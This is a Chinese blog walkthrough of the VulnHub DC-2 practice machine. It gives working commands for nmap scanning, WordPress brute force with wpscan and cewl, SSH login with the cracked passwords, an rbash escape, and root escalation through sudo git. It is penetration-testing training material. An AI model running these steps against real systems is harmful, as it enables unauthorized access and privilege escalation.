打靶训练-项目2:DC-2

2021-08-09

 

0.环境布置

 

我的选择

虚拟机:VMware15

攻击机:kali-2021

靶机:DC-2

浏览器:谷歌浏览器、火狐浏览器

 

DC-2靶机下载地址:

https://www.vulnhub.com/entry/dc-2,311/

其他下载内容见我之前的博客或者自己搜索

 

各个设备的关系

kali与DC-2均为桥接模式

使得本机、kali、DC-2成为三个独立的设备

也可以kali与DC-2均为NAT模式,则本机成为路由器(网关)

 

1.靶机训练

扫描主机

  • arp-scan -l

    192.168.10.105

 

  • nmap -sV -A -p- 192.168.10.105

    80/tcp open http Apache httpd 2.4.10 ((Debian))

    7744/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)

     

  • 浏览器登陆网址失败

    失败原因:本机DNS解析没有设置

    Windows10设置DNS解析:C:WindowsSystem32driversetchosts

    Kali Linux 设置DNS解析:vi /etc/hosts

    格式:IP <Tab键> 域名

    eg:192.168.10.105 dc-2

  • 成功登陆以后

    发现cewl,cewl是kali自带的能够生成密码字典的工具

    发现wordlist,kali系统自带的字典

 

爆破目录

 

字典爆破

  • wpscan扫描工具+cewl字典生成工具+wordlist字典工具(可选项)

    wpscan教程:https://idc.wanyunshuju.com/aqst/1885.html

  • 生成用户字典

    #更新升级
    wpscan --update

    #用户枚举
    wpscan –url http://dc-2 -eu
    #admin jerry tom

    #建立用户字典user.txt
    vi user.txt

    admin
    jerry
    tom
  • 生成密码字典

    #使用cewl生成有关于目标网站的字典passwd.txt
    cewl http://dc-2/ -w passwd.txt
  • 字典爆破

    #使用wpscan对网站进行爆破
    wpscan --ignore-main-redirect --url http://dc-2/ -U user.txt -P passwd.txt -t 30

    #Username: jerry, Password: adipiscing
    #Username: tom, Password: parturient

    #也可以使用burpsuite爆破

 

远程登陆

  • 尝试用户ssh

    7744/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)

    #jerry登陆失败,Password: adipiscing
    ssh jerry@192.168.10.105 -p 7744

    #tom登陆成功,Password: parturient
    ssh tom@192.168.10.105 -p 7744

    ls
    tom@DC-2:~$ ls
    flag3.txt usr
    tom@DC-2:~$ vi flag3.txt
  • 切换用户

    #su到jerry,受限制
    tom@DC-2:~$ su jerry
    -rbash: su: command not found

    #绕过rbash限制
    BASH_CMDS[a]=/bin/sh;a
    export PATH=$PATH:/bin/
    export PATH=$PATH:/usr/bin

    su jerry
    cd /home/jerry
    cat flag4.txt
    #Go on - git outta here!!!!

     

git提权

  • sudo -l

    git命令需要去了解

    sudo命令需要去了解

    sudo -l:查看一些信息,发现可以通过使用git进行root提权

  • git提权

    sudo git help config
    #在末行命令模式输入
    !/bin/bash 或 !‘sh’
    #完成提权

    cd /root/
    ls
    catfinal-flag.txt
    #结束
  •  

内容来源于网络如有侵权请私信删除

文章来源: 博客园

原文链接: https://www.cnblogs.com/jianghe414/p/15120265.html

你还没有登录,请先登录注册
  • 还没有人评论,欢迎说说您的想法!